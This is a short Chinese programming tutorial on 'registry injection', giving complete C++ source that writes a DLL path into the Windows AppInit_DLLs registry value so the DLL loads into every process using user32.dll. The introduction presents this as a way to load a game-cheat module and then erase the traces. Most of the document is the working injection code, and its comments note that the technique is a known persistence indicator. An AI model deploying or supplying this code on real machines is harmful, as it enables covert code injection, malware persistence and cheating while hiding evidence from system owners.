注入(1)--注册表注入

在Windows NT/2000/XP/3000操作系统中，当需要加载user32.dll的程序启动时，user32.dll会加载注册表键HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls下列出的所有模块。所以，可以将外挂模块写在AppInit_Dlls键下，待程序启动后，再将痕迹清除。
注:系统需要重启后才能实现

// Reginject.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"
#include <Windows.h>

#define DSTKEY "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows"
BOOL RegInject(char* DllFullPath);
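// Console entry point: hands the hard-coded DLL path to RegInject and
// prints whether the AppInit_DLLs write succeeded.
// argc/argv are not used; the path is fixed at compile time.
// Returns 0 in every case, so the exit code does not reflect failure;
// callers that script this tool must parse stdout instead.
int _tmain(int argc, _TCHAR* argv[])
{
	(void)argc;
	(void)argv;

	char DllFullPath[MAX_PATH] = "D:\\Hook.dll";
	BOOL bOk = RegInject(DllFullPath);

	// The original messages began with "/n" (a literal slash and 'n');
	// "\n" is the intended newline escape.
	if (bOk)
	{
		printf("\n Registry inject success!\n");
	}
	else
	{
		printf("\n Registry inject fail!\n");
	}

	// Two reads keep the console window open until Enter is pressed
	// (the first may consume a pending character).
	getchar();
	getchar();
	return 0;
}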


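//
// Writes DllFullPath into the AppInit_DLLs value under DSTKEY. The value
// is read by user32.dll, which passes each listed module to LoadLibrary
// when a process that loads user32.dll starts, so the DLL is mapped into
// every such process. This is the classic AppInit_DLLs injection /
// persistence technique: the write needs write rights on HKLM\SOFTWARE,
// and any modification of this value is a well-known indicator that
// endpoint monitoring should alert on.
//
// DllFullPath: NUL-terminated path of the DLL. It must fit in MAX_PATH
//              bytes including the terminator; longer paths (or NULL)
//              are rejected instead of overflowing the local buffer.
// Returns TRUE when the value was written, FALSE on any failure. Errors
// are reported only through OutputDebugString, never via GetLastError.
// Note: the existing value is replaced, not extended.
//
BOOL RegInject(char* DllFullPath)
{
	BOOL bOk = FALSE;
	HKEY hKey = NULL;
	LONG Return;
	BYTE cDllPath[MAX_PATH] = {0};
	size_t PathLen;

	OutputDebugString("[!] RegInject Enter...");

	// Validate the input before touching the registry: the original code
	// memcpy'd strlen()+1 bytes into cDllPath with no bounds check.
	if (DllFullPath == NULL)
	{
		OutputDebugString("[-] RegInject: NULL DLL path!\n");
		goto Exit;
	}
	PathLen = strlen(DllFullPath);
	if (PathLen >= sizeof(cDllPath))
	{
		OutputDebugString("[-] RegInject: DLL path too long!\n");
		goto Exit;
	}

	// Least privilege: RegSetValueEx only needs KEY_SET_VALUE, so the
	// broader KEY_ALL_ACCESS mask is not requested.
	Return = RegOpenKeyEx(
		HKEY_LOCAL_MACHINE,
		DSTKEY,
		0,
		KEY_SET_VALUE,
		&hKey);

	if (Return != ERROR_SUCCESS)
	{
		OutputDebugString("[-] RegOpenKeyEx Error!\n");
		goto Exit;
	}

	// Bounded copy (PathLen + 1 <= MAX_PATH is guaranteed above).
	memcpy(cDllPath, DllFullPath, PathLen + 1);

	// REG_SZ data length must include the terminating NUL; cast the
	// size_t explicitly to the DWORD the API expects.
	Return = RegSetValueEx(
		hKey,
		"AppInit_DLLs",
		0,
		REG_SZ,
		cDllPath,
		(DWORD)(PathLen + 1)
		);

	if (Return != ERROR_SUCCESS)
	{
		// Message names the API actually called (was "RegSetKeyValue").
		OutputDebugString("[-] RegSetValueEx Error!\n");
		goto Exit;
	}

	OutputDebugString("[!] RegInject Exit...");
	bOk = TRUE;
Exit:
	if (hKey)
		RegCloseKey(hKey);
	return bOk;
}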

